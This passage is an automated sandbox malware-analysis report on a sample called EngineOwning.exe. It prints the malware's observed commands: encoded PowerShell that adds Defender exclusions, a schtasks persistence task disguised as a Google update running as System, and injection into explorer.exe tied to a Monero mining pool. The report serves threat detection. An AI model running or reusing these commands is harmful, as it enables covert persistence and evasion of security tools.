      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAHMAdABnAGgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAGUAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAHUAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBmAGoAZQAjAD4A"
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHMAdABnAGgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAGUAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAHUAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBmAGoAZQAjAD4A
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe zaxwujrpzpz0 NV/UX0XBuNRBWS1fF1Br++rCWld6jYh8EV4bO5NNvAb/5HIZwMhaD5NHJK5z9yNMjMMytH6YY4V55yfqWTQcp12cDSmlF6KKjp+Efu9KvL4SaXUjJ1+pbf+qj6k80A11p9RBq/ea7q4JQbAof6DO9w2NSwY2P/eQdDvkJvlXTHwvNMDMUjwmGA6FU/A9poINN+IS9cW53yukVYFD6Su/c8CqGYS4ifglLSM0j7mQykFqVEF0CjxSELaijRRGUV4pKZhHpb12LA0Vdcl7ekwOnt/zMSPiSwVay5rEBRJnuUFPIIktvItGKBK4ACGTOTqoPi0Hwp99GwYdY6hvlhzROvSxGFr63zNaVIZV1HL7mUPX5ICuxBxUgAURBxJcPcCDFtB6+YHcgebLsBjBHY6e778xlKAi+KMQhPPHAt2IhKnBuQNhYbkw20Qh4OsKyGjRuikRJY8g3TEE/RpYBkU2gM2pude0dusb3bcc6h3jJ8mqx1aqIvyYff4zch7WANZWOTWRwEz/LV6jXQrqAfeuV/LYITPX+2lLumdpKzFrcng=
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAHMAdABnAGgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAGUAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAHUAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBmAGoAZQAjAD4A"
      Source: C:\Users\user\Desktop\EngineOwning.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:/ProgramData/winrsdhost.exe
      Source: C:\Users\user\Desktop\EngineOwning.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:/ProgramData/mdsigstub.exe
      Source: C:\Users\user\Desktop\EngineOwning.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls
      Source: C:\Windows\System32\cmd.exeProcess created: C:\ProgramData\winrsdhost.exe C:/ProgramData/winrsdhost.exe
      Source: C:\ProgramData\winrsdhost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHMAdABnAGgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAGUAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAHUAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBmAGoAZQAjAD4A
      Source: C:\ProgramData\winrsdhost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\user\AppData\Roaming\Windows\services86.exe
      Source: C:\ProgramData\winrsdhost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" cmd /c "C:\Users\user\AppData\Roaming\Windows\services86.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\ProgramData\mdsigstub.exe C:/ProgramData/mdsigstub.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAHMAdABnAGgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAGUAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAHUAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBmAGoAZQAjAD4A"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\user\AppData\Roaming\Windows\services86.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Windows\services86.exe C:\Users\user\AppData\Roaming\Windows\services86.exe
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHMAdABnAGgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAGUAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAHUAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBmAGoAZQAjAD4A
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe zaxwujrpzpz0 NV/UX0XBuNRBWS1fF1Br++rCWld6jYh8EV4bO5NNvAb/5HIZwMhaD5NHJK5z9yNMjMMytH6YY4V55yfqWTQcp12cDSmlF6KKjp+Efu9KvL4SaXUjJ1+pbf+qj6k80A11p9RBq/ea7q4JQbAof6DO9w2NSwY2P/eQdDvkJvlXTHwvNMDMUjwmGA6FU/A9poINN+IS9cW53yukVYFD6Su/c8CqGYS4ifglLSM0j7mQykFqVEF0CjxSELaijRRGUV4pKZhHpb12LA0Vdcl7ekwOnt/zMSPiSwVay5rEBRJnuUFPIIktvItGKBK4ACGTOTqoPi0Hwp99GwYdY6hvlhzROvSxGFr63zNaVIZV1HL7mUPX5ICuxBxUgAURBxJcPcCDFtB6+YHcgebLsBjBHY6e778xlKAi+KMQhPPHAt2IhKnBuQNhYbkw20Qh4OsKyGjRuikRJY8g3TEE/RpYBkU2gM2pude0dusb3bcc6h3jJ8mqx1aqIvyYff4zch7WANZWOTWRwEz/LV6jXQrqAfeuV/LYITPX+2lLumdpKzFrcng=
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAHMAdABnAGgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAGUAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAHUAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBmAGoAZQAjAD4A"
      Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "pbsidfqjdbrp
      Source: explorer.exe, 00000028.00000002.702005212.00000000011C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000028.00000002.702005212.00000000011C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
      Source: explorer.exe, 00000028.00000002.702005212.00000000011C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: YProgram Managerf
      Source: explorer.exe, 00000028.00000002.702005212.00000000011C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
      Source: C:\ProgramData\winrsdhost.exeQueries volume information: C:\ProgramData\winrsdhost.exe VolumeInformation
      Source: C:\ProgramData\winrsdhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
      Source: C:\ProgramData\mdsigstub.exeQueries volume information: C:\ProgramData\mdsigstub.exe VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeQueries volume information: C:\Users\user\AppData\Roaming\Windows\services86.exe VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\ProgramData\winrsdhost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
      Source: C:\Users\user\Desktop\EngineOwning.exeCode function: 0_2_00007FF75AF7D53C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
      Source: explorer.exe, 00000028.00000002.702906688.0000000002E6A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: procexp.exe
      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts11
      Windows Management Instrumentation
      1
      Windows Service
      1
      Windows Service
      1
      Disable or Modify Tools
      31
      Input Capture
      1
      System Time Discovery
      Remote Services1
      Archive Collected Data
      Exfiltration Over Other Network Medium1
      Web Service
      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default Accounts1
      Native API
      1
      Scheduled Task/Job
      512
      Process Injection
      11
      Deobfuscate/Decode Files or Information
      LSASS Memory1
      Peripheral Device Discovery
      Remote Desktop Protocol31
      Input Capture
      Exfiltration Over Bluetooth2
      Ingress Tool Transfer
      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain Accounts1
      Command and Scripting Interpreter
      Logon Script (Windows)1
      Scheduled Task/Job
      21
      Obfuscated Files or Information
      Security Account Manager1
      File and Directory Discovery
      SMB/Windows Admin Shares2
      Clipboard Data
      Automated Exfiltration11
      Encrypted Channel
      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local Accounts1
      Scheduled Task/Job
      Logon Script (Mac)Logon Script (Mac)21
      Software Packing
      NTDS25
      System Information Discovery
      Distributed Component Object ModelInput CaptureScheduled Transfer2
      Non-Application Layer Protocol
      SIM Card SwapCarrier Billing Fraud
      Cloud Accounts1
      PowerShell
      Network Logon ScriptNetwork Logon Script11
      Masquerading
      LSA Secrets1
      Query Registry
      SSHKeyloggingData Transfer Size Limits13
      Application Layer Protocol
      Manipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.common31
      Virtualization/Sandbox Evasion
      Cached Domain Credentials241
      Security Software Discovery
      VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup Items512
      Process Injection
      DCSync2
      Process Discovery
      Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem31
      Virtualization/Sandbox Evasion
      Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow11
      Application Window Discovery
      Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing1
      Remote System Discovery
      Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 616095 Sample: EngineOwning.exe Startdate: 26/04/2022 Architecture: WINDOWS Score: 100 89 xmr-eu1.nanopool.org 2->89 91 pastebin.com 2->91 117 Malicious sample detected (through community Yara rule) 2->117 119 Antivirus detection for dropped file 2->119 121 Multi AV Scanner detection for dropped file 2->121 123 9 other signatures 2->123 12 EngineOwning.exe 17 2->12         started        16 svchost.exe 9 1 2->16         started        18 svchost.exe 2->18         started        20 3 other processes 2->20 signatures3 process4 dnsIp5 95 cdn.discordapp.com 162.159.129.233, 443, 49744, 49745 CLOUDFLARENETUS United States 12->95 81 C:\Users\user\AppData\...\servicesx86[1].exe, PE32+ 12->81 dropped 83 C:\Users\user\AppData\Local\...\Client[1].exe, PE32 12->83 dropped 85 C:\ProgramData\winrsdhost.exe, PE32+ 12->85 dropped 87 C:\ProgramData\mdsigstub.exe, PE32 12->87 dropped 22 cmd.exe 1 12->22         started        25 cmd.exe 1 12->25         started        27 WerFault.exe 9 12->27         started        31 2 other processes 12->31 97 127.0.0.1 unknown unknown 16->97 file6 process7 dnsIp8 125 Encrypted powershell cmdline option found 22->125 127 Uses schtasks.exe or at.exe to add and modify task schedules 22->127 33 winrsdhost.exe 6 22->33         started        37 mdsigstub.exe 2 25->37         started        93 192.168.2.1 unknown unknown 27->93 79 C:\ProgramData\Microsoft\...\Report.wer, Little-endian 27->79 dropped file9 signatures10 process11 file12 77 C:\Users\user\AppData\...\services86.exe, PE32+ 33->77 dropped 107 Antivirus detection for dropped file 33->107 109 Multi AV Scanner detection for dropped file 33->109 111 Detected unpacking (changes PE section rights) 33->111 39 cmd.exe 33->39         started        41 cmd.exe 1 33->41         started        44 cmd.exe 33->44         started        113 Machine Learning detection for dropped file 37->113 115 Queries memory information (via WMI often done to detect virtual machines) 37->115 46 WerFault.exe 37->46         started        signatures13 process14 signatures15 48 services86.exe 39->48         started        52 conhost.exe 39->52         started        129 Encrypted powershell cmdline option found 41->129 54 powershell.exe 23 41->54         started        56 conhost.exe 41->56         started        58 conhost.exe 44->58         started        60 schtasks.exe 44->60         started        process16 file17 75 C:\Users\user\AppData\Roaming\...\WR64.sys, PE32+ 48->75 dropped 99 Antivirus detection for dropped file 48->99 101 